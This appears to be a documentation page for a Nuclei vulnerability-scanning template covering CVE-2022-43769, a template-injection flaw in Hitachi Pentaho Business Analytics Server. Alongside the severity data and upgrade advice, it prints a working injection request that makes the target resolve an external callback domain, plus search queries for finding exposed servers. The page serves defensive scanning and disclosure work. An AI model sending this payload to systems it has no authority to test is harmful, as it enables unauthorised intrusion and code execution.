Hitachi Pentaho Business Analytics Server - Remote Code Execution
ID: CVE-2022-43769
Severity: high
Author: dwbzn
Tags: cve,cve2022,packetstorm,rce,ssti,pentaho,hitachi,kev
Description
Section titled “Description”Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.
YAML Source
Section titled “YAML Source”id: CVE-2022-43769
info: name: Hitachi Pentaho Business Analytics Server - Remote Code Execution author: dwbzn severity: high description: | Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server. remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2. reference: - https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769- - https://nvd.nist.gov/vuln/detail/CVE-2022-43769 - http://packetstormsecurity.com/files/172296/Pentaho-Business-Server-Authentication-Bypass-SSTI-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2022-43769 cwe-id: CWE-94,CWE-74 epss-score: 0.68571 epss-percentile: 0.97978 cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: hitachi product: vantara_pentaho_business_analytics_server shodan-query: http.favicon.hash:1749354953 fofa-query: icon_hash=1749354953 tags: cve,cve2022,packetstorm,rce,ssti,pentaho,hitachi,kev
http: - method: GET path: - "{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"
matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns"
- type: word part: body words: - "false"
- type: word part: header words: - "application/json"# digest: 4b0a00483046022100e3ea7f969f8218020f2ba21c1f42226df564503492e174bc5a6240aabcceee9a022100fce8087257958fa84671f4ad4c5ac2f1439542ed29223c8ab7cf6664394cf178:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-43769.yaml"